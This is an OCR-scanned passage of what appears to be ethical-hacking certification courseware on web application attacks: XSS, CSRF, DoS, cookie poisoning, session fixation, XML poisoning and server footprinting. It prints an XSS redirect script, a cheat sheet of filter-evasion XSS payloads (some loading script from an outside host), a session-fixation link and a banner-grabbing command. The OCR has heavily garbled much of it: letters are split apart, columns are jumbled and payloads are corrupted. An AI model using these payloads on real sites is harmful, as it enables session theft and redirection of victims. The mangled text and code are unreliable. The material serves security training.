B ro w s e r S c r ip t S e rv e r
Run
A n a u th o riz e d re q u e s t
X S S E x a m p le : S e n d in g a n U n a u th o r iz e d R e q u e s t
Using an XSS a tta c k , th e a tta c k e r can also send an u n a u th o riz e d re q u e st. The
fo llo w in g are th e steps in v o lv e d in an XSS a tta c k in te n d e d to send an u n a u th o riz e d re q u e s t:
4. The a tta c k e r's se rve r in response to th e user's re q u e s t sends th e page w ith m a licio u s
s c rip t
X S S A t t a c k i n B lo g P o s t in g C E H
4 a ►
Malicious code
<script>onload=
window.Iocation=
' http://www.juggYboy.com'
</script>
is injecting the blog post
U s e r r e d ir e c t e d t o a m a lic io u s
w e b s it e ju g g y b o y .c o m
W eb A p p lic a tio n
M a lic io u s W eb site
1 3 5 X S S A tta c k in a B lo g P o s tin g
M alicio u s c o d e
<script>onload=
A tta c k e r adds a m alicious s c rip t in w in d o w . location=
th e c o m m e n t fie ld o f blog post 'h ttp ://w w w .ju g g y b c y .c o m '
</script>
is in je c tin g t h e blog post
C o m m e n t w ith
m a lic io u s lin k is
s to re d on th e server
U s e r r e d ir e c t e d t o a m a li c i o u s
w e b s it e ju g g y b o y .c o m
X S S A t t a c k in C o m m e n t F ie ld C E H
oooo
U s e r v is it s th e
I Tech Post
w e b s it e Face book acquires file-sharing service
New York-based start-up that lets users privately
and sporadicaty share fles through a drag-and-
drop interface with additional options----------
C om m ent
Jason, I love your blog post!
- Mark (mark@miccasoft.com)
Leave y o u r c o m m en t
M alicious code
< s c r ip t » a le r t ( " H e ll
o Wor I d ") < / sc r ip t>
is in je ctin g th e blog post
H I
ן H^lnVWnild
C o m m e n t w it h T h e a le r t p o p s u p as s o o n
m a lic io u s lin k is a s t h e w e b p a g e is lo a d e d I <*......i
s to r e d o n th e s e r v e r
D a ta b a s e S e rv e r W e b A p p lic a t io n P o p u p W in d o w
J X S S A tta c k in a C o m m e n t F ie ld
■ ....
M a n y In te rn e t w e b p ro g ra m s use HTM L pages th a t d y n a m ic a lly a ccept data fro m
d iffe r e n t sources. The data in th e HTM L pages can be d y n a m ic a lly change d a cco rd in g to th e
re q u e s t. A tta c k e rs use th e HTM L w e b page's tags to m a n ip u la te th e data and to launch th e
a tta c k by chan gin g th e c o m m e n ts fe a tu re w ith a m a licio u s s c rip t. W h e n th e ta rg e t sees th e
c o m m e n t and a c tiva te s it, th e n th e m a lic io u s s c rip t is e xe cu te d on th e ta rg e t's b ro w s e r,
in itia tin g m a lic io u s p e rfo rm a n c e s .
X S S C h e a t S h e e t H C E H
U ilifM itkiul Mm few
N o rm a l XSS JavaScript in je ctio n : <SCRIPT NuN Chars: p e ri -e 'p rin t "<1MG IM G lo w src:<IM G
SRC=h ttp ://h a x k e rs .o rg /x s s .js x /S C R IP T > SRC=java\Oscri p t : ale rt(\" X S S \" )> " ;'> o u t DYNSRC " ־Ja va sa lp t: ale r t f XSS>־(־
Im age XSS: <IM G SRC=־־ja va scrip t:alert('X S S >";)־ N o n -a lp h a-n o n -d ig it XSS: <SCR1PT/XSS IM G lo w src:<IM G
SRC=" h ttp ^ /h a .d c e rs ^ fg /x s s .js " x /S C R !P T > LOWSRC=" ja vascript :alert('X SS')">
N o q u o te s a n d no sem icolon: <IM G
N o n -a lp h a-n o n -d ig it p a rt 2 XSS: <BODY BGSOUND:<BGSOUND
SR C =javascript:alert(־XSS')> o n lo ad ! # $ % & ( ) - + 1 / ] @ ?;:,.\ ־K '= a le rt< ״XSS>)״ SRC ״ ־ja v a s a lp t :ale rt('X SS '(;< ־׳
Case in sensitive XSS atta c k ve cto r: <IM G
Extran eo u s o p e n brackets: LAYER:<LAYER SRC=
SRC=JaVaScRIPt:alert('XSS')> «SC R JPT>alert("X SS") ; / / « / SCR1PT> " h t t p : //h a x k e r s .o r g / script le th tm T x /L A Y E R >
E m b e d d ed ta b : < IM G SRC«"Jav
D ouble o p e n angle b rackets: < lfram e
ascrip t:aiert('X S S ');H> M o ch a: <IM G SRC" ־H vescript:[code]">
src ־h t tp : //h a .c k e rs.o rg /scrip tlet.h tm i <
E m b e d d ed en c o d ed ta b : < IM G
XSS w ith no single q u o te s o r d o u ble q uotes or
SRC ־ ־ja v & # x 0 9 ;a s c rlp t:ale rt ( ,XSS‘);" > US-ASCII encoding: is a ip tu a le rt(E X S S E )i/s a ip tu
sem icolons: SCRIPT>alert (/X S S /s o u rc e K/SCRIPT>
XSS C h e a t S h e e t
Em b ed d ed ca rria g e r e t u r n : י.IM G
XSS lo c ato r ' ־. ׳- < ־X S S > = * { () }
S R C = *jfg ^ k O O .a s c n p t a t e f t f X S S ' ^
C ro ss-S ite R e q u e s t F o rg e ry (C S R F)
E l\
A tta c k c
(*rtifxd 1 lt»K4l IlMtm
fc
U ser T ru s te d W e b s ite M a lic io u s W e b s ite
S to re s th e s e s s io n id e n t f ie r f o r t h e י
se s s io n in a c o o k ie in th e w e b b ro w s e r
...... 1 ©
...
S e n d s a re q u e s t f r o m th e u se r's
! u sin g his se s s io n c o o k ie
© 41!
C o p y r ig h t © b y E&C01nal.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S t r ic t ly P ro h ib ite d .
C r o s s - s ite R e q u e s t F o r g e r y (C S R F ) A tta c k
H o w C S R F A tta c k s W o r k
In a c r o s s - s ite r e q u e s t f o r g e r y a tta c k , t h e a t t a c k e r w a i t s f o r t h e u s e r t o c o n n e c t t o t h e
t r u s t e d s e r v e r a n d t h e n t r ic k s t h e u s e r t o click o n a m a lic io u s lin k c o n t a i n i n g a r b i t r a r y co d e .
W h e n t h e u s e r clicks o n t h e m a lic io u s lin k , t h e a r b i t r a r y c o d e g e ts e x e c u t e d o n t h e t r u s t e d
s e rv e r. T h e f o l l o w i n g d ia g r a m e x p la in s t h e s t e p - b y - s t e p p ro c e s s o f a CSRF a tta c k :
W e b A p p lic a t io n D e n ia l- o f - S e r v ic e
(D o S ) A t t a c k
CEH
•
Targets Application-level DoS attacks emulate the
i ג CPU, Memory, and Sockets same request syntax and network-level
B O B traffic characteristics as that of the
: - Disk Bandwidth
: legitimate clients, which makes it
i - Database Bandwidth B O B undetectable by existing DoS protection :
: - Worker Processes measures :
T h e f o l l o w i n g issues m a k e t h e w e b a p p li c a t i o n s v u ln e r a b l e :
© R e a s o n a b le Use o f E x p e c t a t i o n s
© A p p l i c a t i o n E n v i r o n m e n t B o ttle n e c k s
© I m p l e m e n t a t i o n Flaws
© P o o r D ata V a l id a t i o n
S o m e o f t h e c o m m o n w a y s t o p e r f o r m a w e b a p p l i c a t i o n DoS a t t a c k a re :
■ © B a n d w i d t h c o n s u m p t i o n - f l o o d i n g a n e t w o r k w i t h d a ta
D e n ia l- o f - S e r v ic e (D o S ) E x a m p le s CEH
D e n ia l־o f־S e r v ic e (D o S ) E x a m p le
M o s t w e b a p p l i c a t i o n s a r e d e s i g n e d t o s e r v e o r w i t h s t a n d w i t h l i m i t e d r e q u e s t s . If t h e
l i m i t is e x c e e d e d , t h e w e b a p p l i c a t i o n m a y f a i l t h e s e r v e r t h e a d d i t i o n a l r e q u e s t s . A t t a c k e r s u se
a d v a n ta g e to la u n c h d e n ia l-o f-s e rv ic e a tta c k s o n th e w e b a p p lic a tio n s . A tta c k e rs se n d to o m a n y
r e q u e s ts t o th e w e b a p p lic a tio n u n til it g e ts e x h a u s te d . O n c e th e w e b a p p lic a tio n re c e iv e s
e n o u g h r e q u e s t s , i t s t o p s r e s p o n d i n g t o o t h e r r e q u e s t t h o u g h i t is s e n t b y a n a u t h o r i z e d u s e r .
T h is is b e c a u s e t h e a t t a c k e r o v e r r i d e s t h e w e b a p p l i c a t i o n w i t h f a l s e r e q u e s t s . V a r i o u s w e b
a p p l i c a t i o n DoS a t t a c k s i n c l u d e :
N o te : For c o m p le te coverage o f b u ffe r o v e rflo w conce pts and techniques, refe r to M o d u le 18: B u ffer O v e rflo w
A r b itr a r y C ode
I
Cookie/Session Poisoning CEH
(•rtifWd I itk itjl Nm Im
Cookies are used to m aintain session state in the otherw ise stateless HTTP protocol
C o o k ie p o i s o n i n g a t t a c k s P o is o n in g a l lo w s a n A p ro x y ca n be used fo r
in v o lv e t h e m o d i f i c a t i o n a t ta c k e r t o in je c t t h e r e w r i t i n g t h e s e s s io n d a t a ,
o f t h e c o n t e n t s o f a c o o k ie m a li c io u s c o n t e n t , m o d i f y d i s p la y i n g t h e c o o k i e d a t a ,
( p e r s o n a l in f o r m a t io n s to re d t h e u s e r 's o n l i n e a n d / o r s p e c ify in g a n e w u s e r
in a w e b u s e r 's c o m p u t e r ) in e x p e r ie n c e , a n d o b t a i n t h e ID o r o t h e r s e s s io n i d e n t i f i e r s
o r d e r t o b y p a s s s e c u r it y u n a u th o riz e d in fo r m a tio n in t h e c o o k i e
m e c h a n is m s A
C o o k ie /S e s s io n P o is o n in g
A tta c k e r
H o w C o o k ie P o is o n in g W o r k s
C o o k ie s are m a in ly used by w e b a p p li c a t i o n s t o s im u la te a s t a t e f u l e x p e r ie n c e
d e p e n d in g u p o n th e end u ser. T h e y a re used as an i d e n t i t y f o r t h e s e r v e r side o f w e b
a p p li c a t i o n c o m p o n e n t s . T his a t t a c k a lt e r s t h e v a lu e o f a c o o k ie a t t h e c l i e n t s id e p r i o r t o t h e
r e q u e s t t o t h e s e rv e r. A w e b s e r v e r can se n d a s e t c o o k ie w i t h t h e h e lp o f a n y r e s p o n s e o v e r
t h e p r o v id e d s tr in g a n d c o m m a n d . T h e c o o k ie s a re s t o r e d o n t h e u s e r c o m p u t e r s a n d a re a
s t a n d a r d w a y o f r e c o g n iz in g users. All t h e r e q u e s ts o f t h e c o o k ie s h a v e b e e n s e n t t o t h e w e b
s e rv e r o n c e it has b e e n set. To p r o v id e f u r t h e r f u n c t i o n a l i t y t o t h e a p p li c a t i o n , c o o k ie s can be
m o d i f i e d a n d a n a ly z e d b y Ja vaS cript.
In a s e s s io n f ix a t io n a t ta c k , t h e
A t ta c k e r a s s u m e s t h e i d e n t i t y o f t h e
a t ta c k e r t r ic k s t h e u s e r t o acc e s s a
v ic t im a n d e x p lo it s h is c r e d e n t ia ls a t
g e n u in e w e b s e r v e r u s in g a n e x p lic it
th e s e rv e r
s e s s io n ID v a lu e
Attacker sends an
email containing a link
with a fix session ID h t t p : / / juggybank.dom/login. ja
p?sessionid=4321
User clicks o n th e lin k and is re d ire c te d t o th e bank w e b s ite •
U ser
It User logs in to th e s e rv e r using his c re d e n tia ls and fix e d session ID
S e s s io n F ix a tio n A tta c k s
T h e session f i x a t i o n a t t a c k p r o c e d u r e is e x p la in e d w i t h t h e h e lp o f t h e f o l l o w i n g d ia g r a m :
Attacker
A tta c k e r logs in to th e s e rv e r using th e v ic tim 's
c re d e n tia ls w ith th e sam e session ID
B
DO
User
FIGURE 1 3 .2 6 : H ow C o o k ie P o iso n in g W o rk s
I n s u f f i c i e n t T r a n s p o r t L a y e r
CEH
P r o t e c t io n
I n s u ff ic ie n t t r a n s p o r t la y e r p r o t e c tio n s u p p o r t s w e a k a lg o r ith m s , a n d
u s e s e x p ir e d o r in v a lid c e r t if ic a t e s
T h is v u ln e r a b ilit y e x p o s e s u s e r 's d a ta
t o u n t r u s t e d t h i r d p a r t ie s a n d c a n
le a d t o a c c o u n t t h e f t
In s u f fic ie n t T r a n s p o r t L a y e r P r o te c tio n
SSL/TLS a u t h e n t i c a t i o n s h o u ld be used f o r a u t h e n t i c a t i o n o n t h e w e b s i t e s o r t h e
a t t a c k e r can m o n i t o r n e t w o r k t r a f f i c t o s te a l an a u t h e n t i c a t e d u s e r's se ssio n c o o k ie .
I n s u f f i c ie n t t r a n s p o r t la y e r p r o t e c t i o n m a y a l l o w u n t r u s t e d t h i r d p a r t i e s t o o b t a i n u n a u t h o r i z e d
access t o s e n s itiv e i n f o r m a t i o n . T h e c o m m u n i c a t i o n b e t w e e n t h e w e b s i t e a n d t h e c l i e n t s h o u ld
be p r o p e r l y e n c r y p t e d o r d a ta can be i n t e r c e p t e d , i n je c te d , o r r e d ir e c t e d . V a r io u s t h r e a t s like
a c c o u n t t h e f t s , p h is h in g a tta c k s , a n d a d m in a c c o u n ts m a y h a p p e n a f t e r s y s te m s a re b e in g
c o m p ro m is e d .
J I m p r o p e r e r r o r h a n d l i n g g iv e s i n s i g h t i n t o s o u r c e c o d e s u c h a s lo g ic f l a w s ,
d e f a u lt a c c o u n ts , e tc .
U s in g t h e in f o r m a t i o n r e c e iv e d f r o m a n e r r o r m e s s a g e , a n a t t a c k e r
id e n t if ie s v u ln e r a b ilit ie s
In fo r m a tio n G a th e re d
httpy/j uggyboy.com/
lo o
e O u t o f m e m o ry
B o y .1
« N u ll p o in t e r e x c e p tio n s
G eneral Error
« S y s te m c a ll fa ilu re
Couldnotobtainpost/userInformation
® D a ta b a s e u n a v a ila b le DEBUGMODE
SQLErroc: 1016Can'topenfile:'nuke_bbposts_text.MYO'. (errno: 145)
© N e tw o r k t im e o u t SELECTu.username, u.userjd, u.user_posts, u.user_from,u.user_webs!te.
u.user_email, u.user_msnm,u.user_viewemail, u.user_rank, u.user_sig,
S D a ta b a s e in fo r m a tio n
u.user_sig_bbcode_uid, u.user_alowsmile, p.*, pt.post_text, ptpost_subject
pt.bbcode.uidFROMnuke_bbpostsp, nuke_usersu, nuke_bbposts_text ptWHERE
p.topicJd»1547 '׳ANDpt.postJd■p.postJdANDu.userjd=p.posterjdORDERBY
a W e b a p p lic a tio n lo g ic a l f lo w p.post.tlmeASCLIMIT0, IS
Line:43S
© A p p lic a tio n e n v ir o n m e n t File:/user/home/geeks/www/vonage/modules/Forums/viewtope.php
JJw Si Im p r o p e r E r r o r H a n d lin g
el I m p r o p e r e r r o r h a n d lin g m a y r e s u lt in v a r io u s t y p e s o f issues f o r a w e b s i t e e x c lu s iv e ly
r e la t e d t o s e c u r it y a s p e cts, e s p e c ia lly w h e n in t e r n a l e r r o r m e ssa g e s such as s ta c k tra c e s ,
d a ta b a s e d u m p s , a n d e r r o r c o d e s a re d is p la y e d t o t h e a tta c k e r . A n a t t a c k e r can g e t v a r io u s
d e ta ils r e la t e d t o t h e n e t w o r k v e r s io n , e tc. I m p r o p e r e r r o r h a n d l i n g g ive s in s ig h t i n t o s o u rc e
c o d e such as lo g ic fla w s , d e f a u l t a c c o u n ts , e tc. U sing t h e i n f o r m a t i o n r e c e iv e d f r o m an e r r o r
m ess a g e , an a t t a c k e r i d e n t i f i e s v u l n e r a b i l i t i e s f o r la u n c h in g a tta c k s .
© O ut of m em ory
e N ull p o i n t e r e x c e p tio n s
e S y s te m call fa i lu r e
e D a ta b a s e u n a v a ila b le
0 N e tw o rk tim e o u t
Q D a ta b a s e i n f o r m a t i o n
e W e b a p p li c a t i o n lo g ica l f l o w
I n s e c u r e C r y p t o g r a p h i c S t o r a g e C E H
!. j! In s e c u re C r y p to g r a p h ic S to ra g e
T h e in s e c u r e c r y p t o g r a p h ic s to r a g e m e n t i o n s t h e s ta te o f an a p p li c a t i o n w h e r e p o o r e n c r y p t i o n
c o d e is u sed f o r s e c u r e ly s t o r i n g d a ta in t h e d a ta b a s e . So t h e in s e c u r e d a ta can be e a sily h a c k e d
a n d m o d i f i e d by t h e a t t a c k e r t o g ain c o n f i d e n t i a l a n d s e n s i t i v e i n f o r m a t i o n such as c r e d i t ca rd
in fo rm a tio n , passw ords, SSNs, and o th e r a u th e n tic a tio n c re d e n tia ls w ith a p p ro p ria te
e n c r y p t i o n o r h a s h in g t o la u n c h i d e n t i t y t h e f t , c r e d i t c a rd f r a u d , o r o t h e r c rim e s . D e v e lo p e r s
can a v o id such a tta c k s b y u sin g p r o p e r a lg o r i t h m s t o e n c r y p t t h e s e n s itiv e d a ta .
T h e f o l l o w i n g p ic t o r ia l r e p r e s e n t a t i o n s h o w s t h e v u ln e r a b l e c o d e t h a t is p o o r l y e n c r y p t e d a nd
s e c u re c o d e t h a t is p r o p e r l y e n c r y p t e d u s in g a s e c u re c r y p t o g r a p h i c a l g o r i t h m .
B r o k e n A u t h e n t ic a t io n a n d
CEH
S e s s io n M a n a g e m e n t
B A n a t t a c k e r u s e s v u l n e r a b i l i t i e s in t h e a u t h e n t i c a t i o n o r s e s s io n m a n a g e m e n t f u n c t i o n s s u c h
a s e x p o s e d a c c o u n t s , s e s s io n ID s , lo g o u t , p a s s w o r d m a n a g e m e n t , t i m e o u t s , r e m e m b e r m e ,
s e c r e t q u e s t i o n , a c c o u n t u p d a t e , a n d o t h e r s t o im p e r s o n a t e u s e r s
B r o k e n A u th e n tic a tio n a n d S e s s io n M a n a g e m e n t
A u t h e n t i c a t i o n a n d session m a n a g e m e n t in c lu d e s e v e r y a s p e c t o f u s e r a u t h e n t i c a t i o n
a n d m a n a g in g a c tiv e sessions. Y e t t i m e s s o lid a u t h e n t i c a t i o n s also fa il d u e t o w e a k c r e d e n t i a l
f u n c t i o n s like p a s s w o r d c h a n g e , f o r g o t m y p a s s w o r d , r e m e m b e r m y p a s s w o r d , a c c o u n t u p d a te ,
e tc. U t m o s t c a re has t o be ta k e n r e la t e d t o u s e r a u t h e n t i c a t i o n . It is a lw a y s b e t t e r t o use s t r o n g
a u t h e n t i c a t i o n m e t h o d s t h r o u g h sp ecial s o f t w a r e - a n d h a r d w a r e - b a s e d c r y p t o g r a p h ic t o k e n s
o r b io m e t r i c s . A n a t t a c k e r uses v u ln e r a b i l it ie s in t h e a u t h e n t i c a t i o n o r se ssio n m a n a g e m e n t
f u n c t i o n s such as e x p o s e d a c c o u n ts , session IDs, lo g o u t, p a s s w o r d m a n a g e m e n t , t i m e o u t s ,
r e m e m b e r m e , s e c r e t q u e s t i o n , a c c o u n t u p d a t e , a nd o t h e r s t o i m p e r s o n a t e users.
S e s s io n I D in U R L s
E x a m p le :
h t t p : / / i u g g v s h o p . c o m /s a le /s a le ite m s = 3 0 4 ;is e s s io n id = 1 2 0 M T O ID P X M O O Q S A B G C K L H C J U N 2 J V ? d
e s t= N e w M e x ic o
.N e t TCP Channel,
Fast InfoS et, etc.
W e b S e r v ic e s A r c h ite c tu r e
* T O
WS־W o rk Processes
W S-Federation W S-SecureConversion
WS־Policy
WS W S-Trust
Security
SAML Kerberos X.509
XML E ncryption
Policy
Security Token Profiles :1
XML D igital Signatures
0 Web services evolution and its increasing use in business offers new attack vectors in an application 0
framework
Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing
the connection points; Universal Description, Discovery, and Integration (UDDI) forthe description and
discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web
^ 4 ^ 1־ ^ e b S e r v ic e s A tta c k
© A n a t t a c k e r is u s in g a w e b se rv ic e f o r o r d e r i n g p r o d u c t s , a n d in je c ts a s c r ip t t o re s e t
q u a n t i t y a n d s ta tu s o n t h e c o n f i r m a t i o n p ag e t o less t h a n w h a t w a s o r i g i n a l l y o r d e r e d .
W e b S e r v ic e s F o o t p r in t in g A t t a c k C E H
C«rt1fW
4 itfciul NmIm
X M L Q u e ry X M L R e s p o n s e
^ W e b S e r v ic e s F o o tp r in tin g A tta c k
Q Business E n tity
Q Business S ervice
© B in d in g T e m p le
e T e c h n ic a l M o d e l ( t m o d e l )
W e b S e r v ic e s X M L P o is o n in g CEH
Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema
poisoning in order to generate errors in XML parsing logic and break execution logic
Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection
openings and can be exploited for other web service attacks
XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information
XM L R equest P o is o n e d X M L R e q u e s t
<CustomerRecord>
<CustomerRecord>
<C ustom erN um ber>2010</C ustom erN um ber>
<C ustom erN um ber>2010</C ustom erN um ber>
<FirstNam e>Jason</FirstNam e><Custom erNum ber>
<FirstName>Jason</FirstName>
2010</C ustom erN um ber>
<LastN am e>Springfield</LastN am e>
<FirstName>Jason</FirstNam e>
<Address>Apt 20, 3rd S treet</A ddress>
<LastN am e>Springfield</LastN am e>
<Em ail>jason@ springfield.com </Em ail>
<Address>Apt 20, 3rd Street</A ddress>
<P honeN um ber>6325896325</P honeN um ber>
<Email>jason (®springfield.com </E m ail>
</Custom erRecord>
<P honeN um ber>6325896325</P honeN um ber>
</Custom erRecord>
W e b S e r v ic e s X M L P o is o n in g
A t t a c k e r s i n s e r t m a lic io u s X M L c o d e s in SOAP r e q u e s ts t o p e r f o r m X M L n o d e m a n i p u l a t i o n o r
X M L s c h e m a p o is o n in g in o r d e r t o g e n e r a t e e r r o r s in X M L p a rs in g log ic a nd b r e a k e x e c u t io n
logic. A t t a c k e r s can m a n i p u l a t e X M L e x t e r n a l e n t i t y r e f e r e n c e s t h a t can lead t o a r b i t r a r y file o r
TCP c o n n e c t i o n o p e n in g s a n d can be e x p l o i t e d f o r o t h e r w e b se rv ic e a tta c k s . X M L p o is o n in g
e n a b le s a t ta c k e r s t o ca use a d e n ia l- o f- s e r v ic e a t t a c k a n d c o m p r o m i s e c o n f i d e n t i a l i n f o r m a t i o n .
H a c k in g M e t h o d o l o g y
m m
W e b A p p l i c a t i o n H a c k in g T oo ls
^־־ M o d u le F lo w
So fa r, w e h a v e d iscu ss e d w e b a p p li c a t i o n c o m p o n e n t s a n d v a r io u s t h r e a t s a s s o c ia te d
w i t h w e b a p p lic a tio n s . N o w w e w i ll discuss w e b a p p li c a t i o n h a c k in g m e t h o d o l o g y . A h a c k in g
m e t h o d o l o g y is a w a y t o c h e c k e v e r y p o s s ib le w a y t o c o m p r o m i s e t h e w e b a p p li c a t i o n by
a t t e m p t i n g t o e x p l o i t all p o t e n t i a l v u l n e r a b i l it ie s p r e s e n t in it.
^ W e b A p p Pen T e s t in g W e b A p p C o n c e p ts
S e c u r i t y T o o ls W e b A p p T h re a ts
W e b A p p l i c a t i o n H a c k in g T o o ls
# n ^ W e b A p p H a c k in g M e th o d o lo g y
< סn >
In o r d e r t o h a c k a w e b a p p li c a t i o n , t h e a t t a c k e r in i t i a ll y tr i e s t o g a t h e r as m u c h
i n f o r m a t i o n as p o s s ib le a b o u t t h e w e b i n f r a s t r u c t u r e . F o o t p r i n t i n g is o n e m e t h o d u sin g w h i c h
an a t t a c k e r can g a t h e r v a lu a b le i n f o r m a t i o n a b o u t t h e w e b i n f r a s t r u c t u r e o r w e b a p p li c a t i o n .
J W e b i n f r a s t r u c t u r e f o o t p r i n t i n g i s t h e f i r s t s t e p in w e b a p p l i c a t i o n h a c k i n g ; i t h e l p s a t t a c k e r s t o
s e le c t v ic t im s a n d id e n t if y v u ln e r a b le w e b a p p lic a t io n s
Hidden
Content Discovery
Server Discovery E x tr a c t c o n t e n t a n d
f u n c t i o n a l it y t h a t is n o t
D is c o v e r t h e p h y s ic a l
d i r e c t ly lin k e d o r r e a c h a b le
s e r v e r s t h a t h o s ts
f r o m t h e m a in v is ib le c o n t e n t
w e b a p p lic a tio n Server Identification
G ra b s e r v e r b a n n e r s t o
id e n t if y t h e m a k e a n d
Service Discovery v e r s io n o f t h e w e b
s e rv e r s o ftw a re
D is c o v e r t h e s e r v ic e s r u n n in g o n w e b
s e r v e r s t h a t c a n b e e x p lo it e d as
a t ta c k p a th s f o r w e b a p p h a c k in g
F o o tp r in t W e b In fr a s tr u c tu r e
W e b i n f r a s t r u c t u r e f o o t p r i n t i n g is t h e f i r s t s te p in w e b a p p li c a t i o n h a c k in g ; it h e lp s
a t ta c k e r s to s e le c t v ic tim s and id e n tify v u ln e ra b le web a p p lic a tio n s . Through web
i n f r a s t r u c t u r e f o o t p r i n t i n g , an a t t a c k e r can p e r f o r m :
S e rv e r D is c o v e ry
י
In s e r v e r d is c o v e r y , w h e n t h e r e is an a t t e m p t i n g t o c o n n e c t t o a s e rv e r, t h e r e d i r e c t o r
m a k e s an i n c o r r e c t a s s u m p t i o n t h a t t h e r o o t o f t h e URL n a m e s p a c e w i ll be W e b D A V -
a w a r e . It d is c o v e r s t h e p h ysica l s e rv e rs t h a t h o s t w e b a p p lic a t io n .
S e r v ic e D is c o v e r y
S e rv e r Id e n tific a tio n
G ra b t h e s e r v e r b a n n e r s t o i d e n t i f y t h e m a k e a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e .
It c o n s is ts o f:
F o o t p r in t W e b I n f r a s t r u c t u r e :
S e r v e r D is c o v e r y
■ S e r v e r d is c o v e r y g iv e s in f o r m a t i o n a b o u t t h e l o c a t i o n o f s e r v e r s a n d e n s u r e s t h a t t h e t a r g e t
s e r v e r is a l i v e o n I n t e r n e t
W h o is L o o k u p T ools:
P ort Scanning a tte m p ts t o conn ect t o a p a rtic u la r set o f TCP o r UDP p o rts t o fin d o u t
th e service th a t exists on th e s e rv e r
P o rt Scanning Tools:
9 N m ap 0 W hatsU p P ortScannerTool
1 8 NetScan Tools Pro 6 Hping
F o o tp r in t W e b In fr a s tr u c tu r e : S e rv e r D is c o v e r y
In o r d e r t o f o o t p r i n t a w e b i n f r a s t r u c t u r e , f i r s t y o u n e e d t o d is c o v e r t h e a c t iv e s e r v e r s
o n t h e i n t e r n e t . S e r v e r d is c o v e r y g ive s i n f o r m a t i o n a b o u t t h e lo c a t i o n o f a c tiv e s e rv e rs o n t h e
I n t e r n e t . T h e t h r e e te c h n i q u e s , n a m e l y w h o i s l o o k u p , DNS i n t e r r o g a t i o n , a n d p o r t s c a n n in g ,
h e lp in d is c o v e r in g t h e a c tiv e s e rv e rs a n d t h e i r a s s o c ia te d i n f o r m a t i o n .
W h o is L o o k u p
f 3):
W h o is L o o k u p is a t o o l t h a t a llo w s y o u t o g a t h e r i n f o r m a t i o n a b o u t a d o m a i n w i t h th e
h e lp o f DNS a n d W H O IS q u e r ie s . T his p r o d u c e s t h e r e s u lt in t h e f o r m o f a H T M L
r e p o r t . It is a u t i l i t y t h a t gives i n f o r m a t i o n a b o u t t h e IP a d d re s s o f t h e w e b s e r v e r a n d DNS
n a m e s . S o m e o f t h e W h o is L o o k u p T o o ls are:
e h ttp ://w w w .w h o is .n e t
D N S In te r r o g a tio n
o DNS i n t e r r o g a t i o n is a d i s t r i b u t e d d a ta b a s e t h a t is used by v a r ie d o r g a n i z a t i o n s t o
F o o t p r in t W e b I n f r a s t r u c t u r e :
S e r v ic e D is c o v e r y
F o o tp r in t W e b In fr a s tr u c tu r e : S e r v ic e D is c o v e r y
P ort T y p ic a l HTTP S e rv ic e s
80 W o r l d W i d e W e b s ta n d a r d p o r t
81 A lte rn a te W W W
88 K e r b e ro s
443 SSL ( h tt p s )
900 IB M W e b s p h e r e a d m i n i s t r a t i o n c l i e n t
2301 C o m p a q Insight M a n a g e r
F o o tp rin t W e b In fr a s tr u c tu r e : S e rv e r
Id e n tific a tio n /B a n n e r G r a b b in g
CEH
Urt1fw4 ilhiul lUtbM
A n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f i e l d t o i d e n t i f y t h e m a k e , m o d e l , a n d v e r s io n
o f th e w e b s e rv e r s o ftw a r e
T h is in f o r m a t io n h e lp s a t ta c k e r s t o s e le c t t h e e x p lo it s f r o m v u l n e r a b il it y d a ta b a s e s t o
a t ta c k a w e b s e r v e r a n d a p p lic a tio n s
B a n n e r g r a b b in g t o o ls :
1. T e ln e t 2. N e tc a t 3 . ID S e rv e 4. N e tc ra ft
H
׳ ■, F o o tp r in t W e b In fr a s tr u c tu r e : S e rv e r
Id e n tific a tio n /B a n n e r G r a b b in g
T h r o u g h b a n n e r g ra b b in g , an a t t a c k e r id e n t if ie s b r a n d a n d / o r v e r s io n o f a s e rv e r, an o p e r a t i n g
s y s te m , o r an a p p li c a t i o n . A t t a c k e r s a n a ly z e t h e s e r v e r r e s p o n s e h e a d e r f ie ld t o i d e n t i f y t h e
m a k e , m o d e l , a n d v e r s io n o f t h e w e b s e r v e r s o f t w a r e . T his i n f o r m a t i o n h e lp s a tt a c k e r s t o
s e le c t t h e e x p lo it s f r o m v u l n e r a b i l i t y d a ta b a s e s t o a t t a c k a w e b s e r v e r a n d a p p lic a tio n s .
C : \ t e l n e t w w w .ju g g y b o y .c o m 80 HEAD / H T T P /1 .0
© T e ln e t
Q N etcat
e ID Serve
© N e tc ra ft
F o o tp rin t W e b In fr a s tr u c tu r e : H id d e n
C o n te n t D is c o v e r y
CEH
J D is c o v e r t h e h id d e n c o n t e n t a n d f u n c t i o n a l it y t h a t is n o t r e a c h a b le f r o m t h e m a in
v is ib le c o n t e n t t o e x p l o it u s e r p r iv ile g e s w it h in t h e a p p lic a tio n
Attacker-Directed
Spidering
F o o tp r in t W e b In fr a s tr u c tu r e : H id d e n C o n te n t
D is c o v e r y
W e b S p id e rin g
W e b s p id e r s a u t o m a t i c a l l y d is c o v e r h id d e n c o n t e n t a n d f u n c t i o n a l i t y b y p a rs in g H T M L
f o r m s a n d c l i e n t- s id e Ja v a S c rip t r e q u e s ts a n d re sp o n s e s .
T o o ls t h a t can be u sed t o d is c o v e r t h e h id d e n c o n t e n t b y m e a n s o f w e b s p id e r i n g in c lu d e :
Q O W A S P Zed A t t a c k P ro xy
Q B u r p S p id e r
© W ebS cara b
W e b S p id e r in g U s in g B u r p S u ite C E H
C«rt1fW
4 itfciul NmIm
Ic’cvpt: »/ *
1
AppleVebK1c/S39.^ iKITOJL, Like Cecko)
-h ro n e , ב ג. u . 1 :: 9 .3 a S a ta r /6 3 7 .4
1 lM t ־lg * n e : K o x ilW S .O (Window■* NT C. 2 ; V0V£«) A p p l« 0 » b X lt/3 3 7 . «
{KBTHL, like Oeeko) Chrowe/22.0. i229.9־l Srttor 1 /S 3 7 . 1
R»Z«x«x: Accept: י/•
6
6 SCICD3 ASD2 EABE0 351PE0S7SD 12 S54tP ORN-1OPRBA
\c~*l
h t t p : / / * » w . b in g . c ocV anwwj-.י־/ it o c c M q-b i id-«CCC7£'70 Mttrtn
